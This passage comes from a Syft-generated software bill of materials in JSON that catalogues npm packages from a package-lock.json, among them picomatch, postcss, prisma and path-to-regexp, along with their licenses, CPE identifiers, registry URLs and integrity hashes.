:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/path-expression-matcher@1.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz","integrity":"sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==","dependencies":null}},{"id":"f9cf628256388076","name":"path-key","version":"3.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/path-key@3.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz","integrity":"sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==","dependencies":null}},{"id":"9cf335be710ffc91","name":"path-parse","version":"1.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/path-parse@1.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz","integrity":"sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==","dependencies":null}},{"id":"f605927959537dfd","name":"path-scurry","version":"1.11.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BlueOak-1.0.0","spdxExpression":"BlueOak-1.0.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/path-scurry@1.11.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz","integrity":"sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==","dependencies":{"lru-cache":"^10.2.0","minipass":"^5.0.0 || ^6.0.2 || ^7.0.0"}}},{"id":"e6c60d0f52ae43b7","name":"path-to-regexp","version":"0.1.13","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/path-to-regexp@0.1.13","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz","integrity":"sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==","dependencies":null}},{"id":"f3acb6a3529e1191","name":"peberminta","version":"0.9.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/peberminta@0.9.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz","integrity":"sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ==","dependencies":null}},{"id":"9b208867cdc8b323","name":"picocolors","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/picocolors@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz","integrity":"sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==","dependencies":null}},{"id":"0c0ba7fcf7a893f6","name":"picomatch","version":"2.3.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/picomatch@2.3.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz","integrity":"sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==","dependencies":null}},{"id":"09943c54769c1f79","name":"picomatch","version":"4.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/picomatch@4.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz","integrity":"sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==","dependencies":null}},{"id":"93c54feee38dbf96","name":"pify","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/pify@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/pify/-/pify-2.3.0.tgz","integrity":"sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==","dependencies":null}},{"id":"47481e92080dd044","name":"pirates","version":"4.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/pirates@4.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz","integrity":"sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==","dependencies":null}},{"id":"7a0a81fa01919ffb","name":"png-js","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/png-js@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz","integrity":"sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA==","dependencies":{"fflate":"^0.8.2"}}},{"id":"33a77729322028df","name":"pngjs","version":"5.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/pngjs@5.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz","integrity":"sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==","dependencies":null}},{"id":"a519bffcd9b56c6d","name":"postcss","version":"8.4.31","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/postcss@8.4.31","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz","integrity":"sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==","dependencies":{"nanoid":"^3.3.6","picocolors":"^1.0.0","source-map-js":"^1.0.2"}}},{"id":"588683a1923c27d7","name":"postcss","version":"8.5.12","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/postcss@8.5.12","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz","integrity":"sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA==","dependencies":{"nanoid":"^3.3.11","picocolors":"^1.1.1","source-map-js":"^1.2.1"}}},{"id":"9f2c64d652651310","name":"postcss-import","version":"15.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-import@15.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz","integrity":"sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==","dependencies":{"postcss-value-parser":"^4.0.0","read-cache":"^1.0.0","resolve":"^1.1.7"}}},{"id":"9feba814d6f9cb30","name":"postcss-js","version":"4.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-js@4.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz","integrity":"sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==","dependencies":{"camelcase-css":"^2.0.1"}}},{"id":"07fb83a013bf4ef4","name":"postcss-load-config","version":"6.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-load-config@6.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz","integrity":"sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==","dependencies":{"lilconfig":"^3.1.1"}}},{"id":"16f11e75cb882477","name":"postcss-nested","version":"6.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-nested@6.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz","integrity":"sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==","dependencies":{"postcss-selector-parser":"^6.1.1"}}},{"id":"f7f4c134629f3b3a","name":"postcss-selector-parser","version":"6.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-selector-parser@6.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz","integrity":"sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==","dependencies":{"cssesc":"^3.0.0","util-deprecate":"^1.0.2"}}},{"id":"d70570520f43a33c","name":"postcss-value-parser","version":"4.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/postcss-value-parser@4.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz","integrity":"sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==","dependencies":null}},{"id":"f76e4353403c9c3d","name":"prisma","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/prisma@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz","integrity":"sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A==","dependencies":{"@prisma/engines":"5.22.0"}}},{"id":"da765da41b164754","name":"process-nextick-args","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*","source":"sy